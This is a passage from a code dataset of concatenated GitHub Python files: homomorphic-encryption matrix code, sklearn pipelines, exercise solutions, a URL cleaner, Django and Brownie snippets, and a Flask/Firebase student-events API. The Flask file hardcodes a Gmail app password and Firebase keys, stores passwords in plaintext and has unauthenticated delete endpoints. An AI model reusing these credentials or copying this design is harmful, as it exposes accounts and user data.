in np.hsplit(self.s, n_split)\n ]\n self.n_split = n_split\n\n def compute_res_enc_split(\n self, template_split_from_p2, n_threads, serialized_context_from_p2\n ):\n if n_threads == 1:\n return self._compute_res_enc_split_parallel(\n template_split_from_p2, serialized_context_from_p2\n )\n return self._compute_res_enc_split_single(template_split_from_p2)\n\n def _compute_res_enc_split_single(\n self, template_split_from_p2: List[ts.CKKSVector]\n ):\n \"\"\"\n Compute the enc result of the multiplication\n :param template_split_from_p2: list of enc split vectors template from p2\n :param n_split:\n :return: result of the multiplication\n \"\"\"\n\n return sum(\n [template_split_from_p2[i] @ self.s_split[i].T for i in range(self.n_split)]\n )\n\n def _compute_res_enc_split_parallel(\n self, template_split_from_p2, serialized_context_from_p2\n ):\n \"\"\"\n Function used to parallelize the matrix multiplication\n Parameters\n ----------\n template_from_p2 : ts tensors list from P2\n\n Returns\n -------\n Partial encrypted result\n \"\"\"\n context_from_p2 = ts.context_from(serialized_context_from_p2)\n\n proc_array = []\n shared_list = Manager().list()\n for i in range(self.n_split):\n p = Process(\n target=self.__ex_matrix_mult,\n args=(template_split_from_p2[i], self.s_split[i].T, shared_list),\n )\n proc_array.append(p)\n for p in proc_array:\n p.start()\n\n for p in proc_array:\n p.join()\n\n part_res = list()\n # Deserialization\n for ser_ts in shared_list:\n part_res.append(ts.ckks_vector_from(context=context_from_p2, data=ser_ts))\n\n return sum(part_res)\n\n def __ex_matrix_mult(self, array_enc, mat, shared_res):\n \"\"\"\n target method for parallelization\n Parameters\n ----------\n array_enc : ts tensor\n mat : cleartext matrix\n shared_res : shared list for result\n\n Returns\n -------\n\n \"\"\"\n\n res = array_enc @ mat\n # The ts tensor needs to be serialized to be saved and passed between functions\n shared_res.append(res.serialize())\n","repo_name":"rtaiello/pp_image_registration","sub_path":"src/joint_computations/ckks/v1/party_1_v1.py","file_name":"party_1_v1.py","file_ext":"py","file_size_in_byte":2809,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"57"} +{"seq_id":"12398609608","text":"class Worker:\n def __init__(self, name: str):\n self.name = name\n print(\"Has been inited!\")\n\n def __call__(self, *args, **kwargs):\n self.age = args[0]\n print(\"has been called!\")\n\n\nif __name__ == \"__main__\":\n print(\"Let's start\")\n worker = Worker(\"Karim\")\n print(\"before call\")\n worker(41)\n print(\"##############\")\n","repo_name":"Karimai/ln_py","sub_path":"callable_obj.py","file_name":"callable_obj.py","file_ext":"py","file_size_in_byte":362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"24650437752","text":"from sklearn.datasets import load_iris\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.decomposition import PCA\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.externals import joblib\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn import svm\nfrom sklearn import tree\n\n# Load and split the data\niris = load_iris()\nX_train, X_test, y_train, y_test = train_test_split(iris.data, iris.target, test_size=0.2, random_state=42)\n\n# Construct some pipelines\npipe_lr = Pipeline([('scl', StandardScaler()),\n ('pca', PCA(n_components=2)),\n ('clf', LogisticRegression(random_state=42))])\n\npipe_svm = Pipeline([('scl', StandardScaler()),\n ('pca', PCA(n_components=2)),\n ('clf', svm.SVC(random_state=42))])\n\npipe_dt = Pipeline([('scl', StandardScaler()),\n ('pca', PCA(n_components=2)),\n ('clf', tree.DecisionTreeClassifier(random_state=42))])\n\npipe_cart = Pipeline([('scl', StandardScaler()),\n ('pca', PCA(n_components=2)),\n ('clf', tree.DecisionTreeClassifier(criterion='gini', splitter='best', max_depth=None,\n min_samples_split=2, min_samples_leaf=1,\n min_weight_fraction_leaf=0.0, max_features=None,\n random_state=None, max_leaf_nodes=None,\n min_impurity_decrease=0.0, min_impurity_split=None,\n class_weight=None, presort=False))])\n\n# List of pipelines for ease of iteration\npipelines = [pipe_lr, pipe_svm, pipe_dt, pipe_cart]\n\n# Dictionary of pipelines and classifier types for ease of reference\npipe_dict = {0: 'Logistic Regression', 1: 'Support Vector Machine', 2: 'Decision Tree', 3: 'CART Decision Tre'}\n\n# Fit the pipelines\nfor pipe in pipelines:\n pipe.fit(X_train, y_train)\n\n# Compare accuracies\nfor idx, val in enumerate(pipelines):\n print('%s pipeline tests accuracy: %.3f' % (pipe_dict[idx], val.score(X_test, y_test)))\n\n# Identify the most accurate model on tests data\nbest_acc = 0.0\nbest_clf = 0\nbest_pipe = ''\nfor idx, val in enumerate(pipelines):\n if val.score(X_test, y_test) > best_acc:\n best_acc = val.score(X_test, y_test)\n best_pipe = val\n best_clf = idx\nprint('Classifier with best accuracy: %s' % pipe_dict[best_clf])\n\n# Save pipeline to file\njoblib.dump(best_pipe, 'best_pipeline.pkl', compress=1)\nprint('Saved %s pipeline to file' % pipe_dict[best_clf])\n\ndotfile = open(\"C:\\\\Users\\\\Michael Del Rosario\\\\Desktop\\\\dtree2.dot\", 'w')\ntree.export_graphviz(pipelines[3]._final_estimator.tree_, out_file = dotfile)\ndotfile.close()","repo_name":"mikedelr/DeepLearningActivityRecognition","sub_path":"Test_Pipeline.py","file_name":"Test_Pipeline.py","file_ext":"py","file_size_in_byte":2897,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"5638254943","text":"def solution(name):\n answer = 0\n\n basis = 'ABCDEFGHIJKLMN'\n\n current = 0\n\n for i in range(len(name)) :\n if name[i] == 'A' :\n continue\n \n \n # 왼/오 이동\n answer += min(abs(i-current), len(name) - abs(i-current))\n current = i\n \n\n if name[i] in basis :\n answer += ord(name[i]) - 65\n else :\n answer += 91 - ord(name[i])\n print(current, answer)\n\n return answer\n\nprint(solution(\"ABAAAAAAAAABB\"))","repo_name":"jaenny/Algorithm_WinterStudy","sub_path":"jaenny/프로그래머스/조이스틱.py","file_name":"조이스틱.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"16006849045","text":"def solution(strs):\n result = {}\n\n for i in range(len(strs)):\n result[1] = strs[i]\n for j in range(i+1,len(strs)):\n temp= strs[i:j]\n if strs[j] not in temp:\n if j-i+1 not in result:\n result[j-i+1] = strs[i:j+1]\n else:\n break\n\n ansKey=max(result.keys())\n ret=result[ansKey]\n\n return ansKey\n\n\nif __name__ == '__main__':\n\n strs = 'abcabcbb'\n\n result = solution(strs)\n\n print('result : ' + str(result))","repo_name":"jsw4215/algorithm_study","sub_path":"hashTable/longestSubstringWithoutRepeatingCharacters.py","file_name":"longestSubstringWithoutRepeatingCharacters.py","file_ext":"py","file_size_in_byte":518,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"5108230794","text":"from cache_utils.decorators import cached\nimport re\nimport urllib\nimport urlparse\nimport requests\n\n\nclass Untiny(object):\n\n SERVICES_URL = \"http://untiny.me/api/1.0/services/\"\n EXTRACT_URL = \"http://untiny.me/api/1.0/extract/\"\n\n @cached(60 * 60 * 24) # Cache for 1 day\n def get_services(self):\n \"\"\"\n Get a set of tiny URL services from untiny.me.\n This set consists of domain names.\n \"\"\"\n try:\n response = requests.get(\n Untiny.SERVICES_URL,\n params=dict(format=\"text\")\n )\n except requests.RequestException:\n return set()\n\n return set([s.strip() for s in response.text.split(',')])\n\n def is_tiny(self, url):\n \"\"\"\n Check if the provided URL is tiny.\n \"\"\"\n return urlparse.urlsplit(url).netloc in self.get_services()\n\n @cached(60 * 60 * 24) # Cache for 1 day\n def _do_extract(self, url):\n try:\n response = requests.get(\n Untiny.EXTRACT_URL,\n params=dict(\n format=\"text\",\n url=url,\n )\n )\n except requests.RequestException:\n return url\n return response.text\n\n def extract(self, url):\n \"\"\"\n Return an untinied version of the given URL.\n If the URL is not tiny it's returned unchanged.\n \"\"\"\n if not self.is_tiny(url):\n return url\n # The actual extraction is done in utility method so that\n # result is cached only if is_tiny() check has passed.\n return self._do_extract(url)\n\n\nclass URLFinder(object):\n\n URL_RE = re.compile('http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\\(\\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+', re.IGNORECASE)\n BLACKLIST_DOMAINS = set([\n \"instagr.am\",\n \"instagram.com\",\n \"yfrog.com\",\n \"foursquare.com\",\n \"www.facebook.com\",\n \"m.facebook.com\",\n \"twitter.com\",\n \"tmi.me\",\n \"m.tmi.me\",\n \"imgur.com\",\n \"twitter.yfrog.com\",\n \"twitpic.com\",\n \"pics.lockerz.com\",\n \"adf.ly\",\n \"businesstipsinfo.com\",\n \"marketingwebsitereview.info\",\n ])\n\n def __init__(self):\n self.untiny = Untiny()\n\n def _is_param_allowed(self, param, value):\n \"\"\"\n Check the query string parameter is allowed or should be removed.\n \"\"\"\n if param.startswith(\"utm_\"):\n return False\n if param == \"spref\" and value == \"tw\":\n return False\n return True\n\n def clean_params(self, url):\n \"\"\"\n Remove superfluous parameters from query string.\n \"\"\"\n if isinstance(url, unicode):\n url = url.encode(\"utf-8\")\n parts = list(urlparse.urlsplit(url))\n if not parts[3]:\n return url\n query = urlparse.parse_qsl(parts[3])\n query = [q for q in query if self._is_param_allowed(*q)]\n if query:\n parts[3] = urllib.urlencode(query)\n else:\n parts[3] = ''\n return urlparse.urlunsplit(parts).decode(\"utf-8\")\n\n def is_blacklisted(self, url):\n \"\"\"\n Check if the provided URL should be blacklisted.\n \"\"\"\n return urlparse.urlsplit(url).netloc in URLFinder.BLACKLIST_DOMAINS\n\n def follow_redirects(self, url):\n \"\"\"\n Follow all redirects from given URL. Return None if the final URL\n can't be accessed.\n \"\"\"\n try:\n return requests.get(url).url\n except requests.RequestException:\n return None\n\n def clean_url(self, url):\n \"\"\"\n Clean the given URL.\n \"\"\"\n if self.is_blacklisted(url):\n return None\n\n # If the URL was untinyfied we need to start over.\n extracted = self.untiny.extract(url)\n if extracted != url:\n return self.clean_url(extracted)\n\n redirects_to = self.follow_redirects(extracted)\n if not redirects_to:\n return None\n\n # If the URL redirects somewhere else we need to start over.\n if redirects_to != url:\n return self.clean_url(redirects_to)\n\n return self.clean_params(redirects_to)\n\n def find_urls(self, text):\n urls = set()\n\n for url in re.findall(self.URL_RE, text):\n if url not in urls:\n cleaned = self.clean_url(url)\n if cleaned:\n urls.add(cleaned)\n\n return urls\n\n\nurl_finder = URLFinder()\n","repo_name":"andreyfedoseev/djangourls.com","sub_path":"apps/trends/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4540,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"57"} +{"seq_id":"38974273548","text":"def dfs(series, length):\n if length == N:\n print(*series, sep='')\n quit()\n\n length += 1\n half_length = length // 2\n series.append(0)\n for n in range(1, 4):\n if series[-2] == n:\n continue\n\n series[-1] = n\n for l in range(1, half_length + 1):\n if series[-l:] == series[-2 * l: -l]:\n break\n else:\n dfs(series[:], length)\n\n\nN = int(input())\ndfs([1], 1)\n","repo_name":"leeholeo/Algorithm_study","sub_path":"high_study/week_14/2661_good_series.py","file_name":"2661_good_series.py","file_ext":"py","file_size_in_byte":454,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"38472811821","text":"# be sure the file name start with 'test'\n# if you want to use test flags see pytest doc\nfrom brownie import SimpleStorage, accounts\n\n# ==============================================\n# we need to test when we deploy our smart contract, it start with 0 in retrieve() function\ndef test_deploy():\n # Arrange\n account=accounts[0]\n simple_storage=SimpleStorage.deploy({\"from\": account})\n # Act \n starting_value=simple_storage.retrieve()\n expected=0\n # Assert\n assert starting_value==expected\n \ndef test_updating_storage():\n # Arrange\n account=accounts[0];\n simple_storage=SimpleStorage.deploy({\"from\": account})\n # Act\n simple_storage.store(15,{\"from\":account})\n expected=15\n retrieve_value=simple_storage.retrieve()\n # Assert\n assert expected==retrieve_value\n","repo_name":"AbhishekSingh581/brownie_Simple_Storage","sub_path":"tests/test_simple_storage.py","file_name":"test_simple_storage.py","file_ext":"py","file_size_in_byte":809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"36139118402","text":"from django.shortcuts import render\n\nfrom .models import Contact\nfrom .forms import ContactForm\n\nfrom django.core.mail import send_mail\n\n# 发送邮件的说明\n# https://code.ziqiangxuetang.com/django/django-send-email.html\n\n# Create your views here.\n\ndef post_contact(request):\n\n if request.method == 'POST':\n form = ContactForm(request.POST)\n if form.is_valid():\n\n msg = form.save(commit=False)\n msg.save()\n\n send_mail(msg.subject, msg.email + \"-----\" +msg.message, '760822901@qq.com',\n ['law@xqopen.cn'], fail_silently=False)\n\n return render(request, 'lawBlog/contact.html',context={'postReturn': '提交成功'})\n else:\n return render(request, 'lawBlog/index.html')","repo_name":"maxlee12/Blog_django","sub_path":"blog/Contacts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":771,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"57"} +{"seq_id":"74493586738","text":"# Made using code adapted from: https://www.youtube.com/watch?v=sVwWEoDa_uY&list=PLs3IFJPw3G9Jwaimh5yTKot1kV5zmzupt&index=6\n# Made using code adapted from: https://github.com/The-Intrigued-Engineer/python_emails/blob/main/text_email.py\n# Made using code adapted from: https://www.codeitbro.com/send-email-using-python/\n\nfrom flask import Flask, request, jsonify\nimport pyrebase\nfrom flask_cors import CORS\nimport smtplib\nimport ssl\nimport qrcode\n\n############################################# DB and API configs############################################\n\n\napi = Flask(__name__)\nCORS(api)\n\n\nfirebaseConfig = {\n \"apiKey\": \"AIzaSyAasBeKh-JrdSSllz2GEg8YEvlimoBR2J8\",\n \"authDomain\": \"eventos-tec-2d13f.firebaseapp.com\",\n \"databaseURL\": \"https://eventos-tec-2d13f-default-rtdb.firebaseio.com\",\n \"projectId\": \"eventos-tec-2d13f\",\n \"storageBucket\": \"eventos-tec-2d13f.appspot.com\",\n \"messagingSenderId\": \"684230874738\",\n \"appId\": \"1:684230874738:web:422955e4291d765ee194eb\"\n}\n\nfb = pyrebase.initialize_app(firebaseConfig)\nbase = fb.database()\n\n############################################# SMTP ############################################\n\ndef enviarCorreoATodos(message):\n try:\n estudiantes = base.child(\"estudiante\").get()\n\n for estudiante in estudiantes.each():\n print(estudiante.val())\n enviarCorreo(estudiante.val()[\"correo\"], message)\n except Exception as e:\n print(e)\n\ndef enviarCorreo(email_to, message):\n img = qrcode.make('Some data here')\n type(img) # qrcode.image.pil.PilImage\n img.save(\"qrcode.png\")\n\n smtp_port = 587 # Standard secure SMTP port\n smtp_server = \"smtp.gmail.com\" # Google SMTP Server\n\n email_from = \"bibliotecmail@gmail.com\"\n # email_to = \"xxxxxxxxxx@gmail.com\"\n\n pswd = \"pubrnylofjmuqmff\"\n\n # Create context\n simple_email_context = ssl.create_default_context()\n\n try:\n # Connect to the server\n print(\"Connecting to server...\")\n TIE_server = smtplib.SMTP(smtp_server, smtp_port)\n TIE_server.starttls(context=simple_email_context)\n TIE_server.login(email_from, pswd)\n print(\"Connected to server :-)\")\n\n # Send the actual email\n print()\n print(f\"Sending email to - {email_to}\")\n TIE_server.sendmail(email_from, email_to, message)\n print(f\"Email successfully sent to - {email_to}\")\n\n # If there's an error, print it out\n except Exception as e:\n print(e)\n print(\"Error al enviar correo a: \", email_to)\n\n # Close the port\n finally:\n TIE_server.quit()\n\n\n############################################# Asociaciones ############################################\n\n# Esta función registra una asociación y su información en la DB\n# Primero revisa si una con el mismo id ya existía\n@api.route('/crear_asociacion', methods=[\"POST\"])\ndef crear_asociacion():\n data = request.get_json()\n asociacion_id = data[\"asociacion_id\"]\n nombre = data[\"nombre\"]\n\n nueva_asociacion = {\n \"asociacion_id\": asociacion_id,\n \"nombre\": nombre\n }\n\n try:\n # Valida si la asociación ya fue registrada \n asociaciones = base.child(\"asociacion\").get()\n for asociacion in asociaciones.each():\n print(asociacion.val()[\"asociacion_id\"])\n if (asociacion.val()[\"asociacion_id\"] == asociacion_id):\n return jsonify({\"message\": \"Esta asociacion ya ha sido registrada\"})\n\n base.child(\"asociacion\").push(nueva_asociacion)\n return jsonify({\"message\": \"La asociacion se registró exitosamente\"})\n\n except:\n return jsonify({\"message\": \"Hubo un error al agregar la asociacion\"})\n\n# Esta función es un get de todas las asociaciones\n@api.route('/get_asociaciones', methods=[\"POST\"])\ndef get_asociaciones():\n try:\n asociaciones = base.child(\"asociacion\").get().val()\n lista_asociaciones = list(asociaciones.values())\n return jsonify(lista_asociaciones)\n\n except:\n return jsonify({\"Hubo un error al consultar las asociaciones\"})\n \n# Esta función es un update de asociaciones\n@api.route('/update_asociacion', methods=[\"POST\"])\ndef update_asociacion():\n data = request.get_json()\n asociacion_id = data[\"asociacion_id\"]\n nombre = data[\"nombre\"]\n\n nueva_asociacion = {\n \"asociacion_id\": asociacion_id,\n \"nombre\": nombre\n }\n try:\n asociaciones = base.child(\"asociacion\").get()\n for asociacion in asociaciones.each():\n if (asociacion.val()[\"asociacion_id\"] == asociacion_id):\n if (nombre != \"\"):\n base.child(\"asociacion\").child(\n asociacion.key()).update({\"nombre\": nombre})\n \n message = \"Se actualizaron los datos de la asociacion: \"\n message = message + str(nueva_asociacion[\"asociacion_id\"])\n enviarCorreoATodos(message.encode('utf-8'))\n return jsonify({\"message\": \"La asociacion se actualizó exitosamente\"})\n\n return jsonify({\"message\": \"La asociacion no existe\"})\n\n except:\n return jsonify({\"message\": \"Hubo un error al actualizar La asociacion\"})\n\n# Esta función elimina una asociación\n@api.route('/delete_asociacion', methods=[\"POST\"])\ndef delete_asociacion():\n data = request.get_json()\n asociacion_id = data[\"asociacion_id\"]\n\n try:\n asociaciones = base.child(\"asociacion\").get()\n for asociacion in asociaciones.each():\n if (asociacion.val()[\"asociacion_id\"] == asociacion_id):\n base.child(\"asociacion\").child(asociacion.key()).remove()\n return jsonify({\"message\": \"La asociacion se eliminó exitosamente\"})\n\n return jsonify({\"message\": \"La asociacion no existe\"})\n\n except:\n return jsonify({\"message\": \"Hubo un error al eliminar La asociacion\"})\n\n############################################# Estudiantes ############################################\n\n# Esta función registra a un estudiante, primero revisa si uno con este carnet ya existía\n@api.route('/crear_estudiante', methods=[\"POST\"])\ndef crear_estudiante():\n data = request.get_json()\n carnet = data[\"carnet\"]\n nombre = data[\"nombre\"]\n asociacion_id = data[\"asociacion_id\"]\n tipo = data[\"tipo\"]\n correo = data[\"correo\"]\n contrasena = data[\"contrasena\"]\n\n nuevo_estudiante = {\n \"carnet\": carnet,\n \"nombre\": nombre,\n \"asociacion_id\": asociacion_id,\n \"tipo\": tipo,\n \"correo\": correo,\n \"contrasena\": contrasena\n }\n\n try:\n # Validates if the student has already been registered\n estudiantes = base.child(\"estudiante\").get()\n for estudiante in estudiantes.each():\n print(estudiante.val()[\"carnet\"])\n if (estudiante.val()[\"carnet\"] == carnet):\n return jsonify({\"message\": \"Este estudiante ya ha sido registrado\"})\n\n base.child(\"estudiante\").push(nuevo_estudiante)\n return jsonify({\"message\": \"El estudiante se registro exitosamente\"})\n\n except:\n return jsonify({\"message\": \"Hubo un error al agregar al estudiante\"})\n\n# Esta función es un get de los estudiante\n@api.route('/get_estudiantes', methods=[\"POST\"])\ndef get_estudiantes():\n try:\n estudiantes = base.child(\"estudiante\").get().val()\n lista_estudiantes = list(estudiantes.values())\n return jsonify(lista_estudiantes)\n\n except:\n return jsonify({\"message\": \"Hubo un error al consultar los estudiante\"})\n\n# Esta función actualiza la información de un estudiante\n@api.route('/update_estudiante', methods=[\"POST\"])\ndef update_estudiante():\n data = request.get_json()\n carnet = data[\"carnet\"]\n nombre = data[\"nombre\"]\n correo = data[\"correo\"]\n asociacion_id = data[\"asociacion_id\"]\n tipo = data[\"tipo\"]\n\n nuevo_estudiante = {\n \"carnet\": carnet,\n \"nombre\": nombre,\n \"correo\": correo,\n \"asociacion_id\": asociacion_id,\n \"tipo\": tipo\n\n }\n\n try:\n estudiantes = base.child(\"estudiante\").get()\n for estudiante in estudiantes.each():\n print(estudiante.val()[\"carnet\"])\n if (estudiante.val()[\"carnet\"] == carnet):\n if (nombre != \"\"):\n base.child(\"estudiante\").child(\n estudiante.key()).update({\"nombre\": nombre})\n if (correo != \"\"):\n base.child(\"estudiante\").child(\n estudiante.key()).update({\"correo\": correo})\n if (asociacion_id != \"\"):\n base.child(\"estudiante\").child(estudiante.key()).update(\n {\"asociacion_id\": asociacion_id})\n if (tipo != \"\"):\n base.child(\"estudiante\").child(estudiante.key()).update(\n {\"tipo\": tipo})\n \n return jsonify({\"message\": \"El estudiante se editó exitosamente\"})\n\n return jsonify({\"message\": \"Este estudiante no se ha encontrado\"})\n\n except:\n return jsonify({\"message\": \"Hubo un error al editar al estudiante\"})\n\n# Esta función elimina a un estudiante\n@api.route('/delete_estudiante', methods=[\"POST\"])\ndef delete_estudiante():\n data = request.get_json()\n carnet = data[\"carnet\"]\n\n try:\n estudiantes = base.child(\"estudiante\").get()\n for estudiante in estudiantes.each():\n if (estudiante.val()[\"carnet\"] == carnet):\n base.child(\"estudiante\").child(estudiante.key()).remove()\n return jsonify({\"message\": \"El estudiante se elimino exitosamente\"})\n\n return jsonify({\"message\": \"El estudiante no existe\"})\n\n except:\n return jsonify({\"message\": \"Hubo un error al eliminar al estudiante\"})\n\n# Esta función crea una asignación para un colaborador\n@api.route('/asignar_colaborador', methods=[\"POST\"])\ndef asignar_colaborador():\n data = request.get_json()\n carnet = data[\"carnet\"]\n flag = data[\"flag\"]\n evento_id = data[\"evento_id\"]\n actividad_id = data[\"actividad_id\"]\n\n if flag == 'true':\n nueva_asignacion = {\n \"carnet\": carnet,\n \"evento_id\": evento_id,\n }\n else: \n nueva_asignacion = {\n \"carnet\": carnet,\n \"evento_id\": evento_id,\n \"actividad_id\": actividad_id\n }\n try:\n base.child(\"asignacion\").push(nueva_asignacion)\n return jsonify({\"message\": \"La asignacion asignacion se registro exitosamente\"})\n\n except:\n return jsonify({\"message\": \"Hubo un error al agregar la asignacion\"})\n\n############################################# Eventos ############################################\n\n# Esta función crea un evento\n@api.route('/crear_evento', methods=[\"POST\"])\ndef crear_evento():\n data = request.get_json()\n evento_id = data[\"evento_id\"]\n nombre = data[\"nombre\"]\n fecha_inicio = data[\"fecha_inicio\"]\n fecha_fin = data[\"fecha_fin\"]\n asociacion_id = data[\"asociacion_id\"]\n capacidad = data[\"capacidad\"]\n descripcion = data[\"descripcion\"]\n\n nuevo_evento = {\n \"evento_id\": evento_id,\n \"nombre\": nombre,\n \"fecha_inicio\": fecha_inicio,\n \"fecha_fin\": fecha_fin,\n \"asociacion_id\": asociacion_id,\n \"capacidad\": capacidad,\n \"descripcion\": descripcion\n }\n\n try:\n # Validates if the event has already been registered\n eventos = base.child(\"evento\").get()\n for evento in eventos.each():\n print(evento.val()[\"evento_id\"])\n if (evento.val()[\"evento_id\"] == evento_id):\n return jsonify({\"message\": \"Este evento ya ha sido registrado\"})\n\n base.child(\"evento\").push(nuevo_evento)\n return jsonify({\"message\": \"El evento se registro exitosamente\"})\n\n except:\n return jsonify({\"message\": \"Hubo un error al agregar al evento\"})\n\n# Esta función es un get de los eventos\n@api.route('/get_eventos', methods=[\"POST\"])\ndef get_eventos():\n try:\n eventos = base.child(\"evento\").get().val()\n lista_eventos = list(eventos.values())\n return jsonify(lista_eventos)\n\n except:\n return jsonify({\"message\": \"Hubo un error al consultar los eventos\"})\n\n# Esta función es un update de los eventos\n@api.route('/update_evento', methods=[\"POST\"])\ndef update_evento():\n data = request.get_json()\n evento_id = data[\"evento_id\"]\n nombre = data[\"nombre\"]\n fecha_inicio = data[\"fecha_inicio\"]\n fecha_fin = data[\"fecha_fin\"]\n asociacion_id = data[\"asociacion_id\"]\n capacidad = data[\"capacidad\"]\n descripcion = data[\"descripcion\"]\n\n nuevo_evento = {\n \"data\": data,\n \"evento_id\": evento_id,\n \"nombre\": nombre,\n \"fecha_inicio\": fecha_inicio,\n \"fecha_fin\": fecha_fin,\n \"asociacion_id\": asociacion_id,\n \"capacidad\": capacidad,\n \"descripcion\": descripcion\n }\n\n try:\n eventos = base.child(\"evento\").get()\n for evento in eventos.each():\n print(evento.val()[\"evento_id\"])\n if (evento.val()[\"evento_id\"] == evento_id):\n if (nombre != \"\"):\n base.child(\"evento\").child(\n evento.key()).update({\"nombre\": nombre})\n if (fecha_inicio != \"\"):\n base.child(\"evento\").child(evento.key()).update(\n {\"fecha_inicio\": fecha_inicio})\n if (fecha_fin != \"\"):\n base.child(\"evento\").child(evento.key()).update(\n {\"fecha_fin\": fecha_fin})\n if (asociacion_id != \"\"):\n base.child(\"evento\").child(evento.key()).update(\n {\"asociacion_id\": asociacion_id})\n if (capacidad != \"\"):\n base.child(\"evento\").child(evento.key()).update(\n {\"capacidad\": capacidad})\n if (descripcion != \"\"):\n base.child(\"evento\").child(evento.key()).update(\n {\"descripcion\": descripcion})\n message = \"Se modificó el evento: \"\n message = message + nombre\n enviarCorreoATodos(message.encode('utf-8'))\n return jsonify({\"message\": \"El evento se edito exitosamente\"})\n\n return jsonify({\"message\": \"Este evento no se ha encontrado\"})\n\n except:\n return jsonify({\"message\": \"Hubo un error al editar al evento\"})\n\n# Esta función elimina un evento\n@api.route('/delete_evento', methods=[\"POST\"])\ndef delete_evento():\n data = request.get_json()\n evento_id = data[\"evento_id\"]\n\n try:\n eventos = base.child(\"evento\").get()\n for evento in eventos.each():\n if (evento.val()[\"evento_id\"] == evento_id):\n base.child(\"evento\").child(evento.key()).remove()\n return jsonify({\"message\": \"El evento se elimino exitosamente\"})\n\n return jsonify({\"message\": \"El evento no existe\"})\n\n except:\n return jsonify({\"message\": \"Hubo un error al eliminar al evento\"})\n\n# Esta función es un update de los eventos\n@api.route('/update_capacidad', methods=[\"POST\"])\ndef update_capacidad():\n data = request.get_json()\n evento_id = data[\"evento_id\"]\n capacidad = data[\"capacidad\"]\n\n nuevo_evento = {\n \"data\": data,\n \"evento_id\": evento_id,\n \"capacidad\": capacidad\n }\n\n try:\n eventos = base.child(\"evento\").get()\n for evento in eventos.each():\n print(evento.val()[\"evento_id\"])\n if (evento.val()[\"evento_id\"] == evento_id):\n if (capacidad != \"\"):\n base.child(\"evento\").child(evento.key()).update(\n {\"capacidad\": capacidad})\n return jsonify({\"message\": \"El evento se edito exitosamente\"})\n\n return jsonify({\"message\": \"Este evento no se ha encontrado\"})\n\n except:\n return jsonify({\"message\": \"Hubo un error al editar al evento\"})\n\n# Crea un nuevo interes\n@api.route('/marcar_interes', methods=[\"POST\"])\ndef marcar_interes():\n data = request.get_json()\n\n evento_id = data[\"evento_id\"]\n correo = data[\"correo\"]\n\n nuevo_interes = {\n \"evento_id\": evento_id,\n \"correo\": correo\n }\n\n try:\n # Validates if the event has already been registered\n intereses = base.child(\"interes\").get()\n\n base.child(\"interes\").push(nuevo_interes)\n return jsonify({\"message\": \"El interes se registro exitosamente\"})\n\n except:\n return jsonify({\"message\": \"Hubo un error al agregar el interes\"})\n\n#Retorna todos los intereses\n@api.route('/get_intereses', methods=[\"POST\"])\ndef get_interes():\n try:\n intereses = base.child(\"interes\").get().val()\n lista_intereses = list(intereses.values())\n return jsonify(lista_intereses)\n\n except:\n return jsonify({\"message\": \"Hubo un error al consultar los intereses\"})\n############################################# Actividades ############################################\n\n# Esta función crea una nueva actividad\n@api.route('/crear_actividad', methods=[\"POST\"])\ndef crear_actividad():\n data = request.get_json()\n evento_id = data[\"evento_id\"]\n actividad_id = data[\"actividad_id\"]\n nombre = data[\"nombre\"]\n fecha = data[\"fecha\"]\n hora_inicio = data[\"hora_inicio\"]\n hora_fin = data[\"hora_fin\"]\n descripcion = data[\"descripcion\"]\n\n nueva_actividad = {\n \"evento_id\": evento_id,\n \"actividad_id\": actividad_id,\n \"nombre\": nombre,\n \"fecha\": fecha,\n \"hora_inicio\": hora_inicio,\n \"hora_fin\": hora_fin,\n \"descripcion\": descripcion\n }\n\n try:\n # Validates if the activity has already been registered\n eventos = base.child(\"evento\").get()\n actividades = base.child(\"actividad\").get()\n for evento in eventos.each():\n print(evento.val()[\"evento_id\"])\n if (evento.val()[\"evento_id\"] == evento_id):\n\n for actividad in actividades.each():\n if (actividad.val()[\"actividad_id\"] == actividad_id): \n return jsonify({\"message\": \"La actividad ya existe\"})\n \n base.child(\"actividad\").push(nueva_actividad)\n return jsonify({\"message\": \"La actividad se registro exitosamente\"})\n\n return jsonify({\"message\": \"El evento no existe\"})\n \n\n except:\n return jsonify({\"message\": \"Hubo un error al agregar la actividad\"})\n\n# Get de las actividades\n@api.route('/get_actividades', methods=[\"POST\"])\ndef get_actividades():\n try:\n actividades = base.child(\"actividad\").get().val()\n lista_actividades = list(actividades.values())\n return jsonify(lista_actividades)\n\n except:\n return jsonify({\"message\": \"Hubo un error al consultar las actividades\"})\n\n# Esta función es un update de las actividades\n@api.route('/update_actividad', methods=[\"POST\"])\ndef update_actividad():\n data = request.get_json()\n evento_id = data[\"evento_id\"]\n actividad_id = data[\"actividad_id\"]\n nombre = data[\"nombre\"]\n fecha = data[\"fecha\"]\n hora_inicio = data[\"hora_inicio\"]\n hora_fin = data[\"hora_fin\"]\n descripcion = data[\"descripcion\"]\n\n nueva_actividad = {\n \"evento_id\": evento_id,\n \"actividad_id\": actividad_id,\n \"nombre\": nombre,\n \"fecha\": fecha,\n \"hora_inicio\": hora_inicio,\n \"hora_fin\": hora_fin,\n \"descripcion\": descripcion\n }\n\n try:\n actividades = base.child(\"actividad\").get()\n for actividad in actividades.each():\n if ((actividad.val()[\"evento_id\"] == evento_id) and (actividad.val()[\"actividad_id\"] == actividad_id)):\n if (nombre != 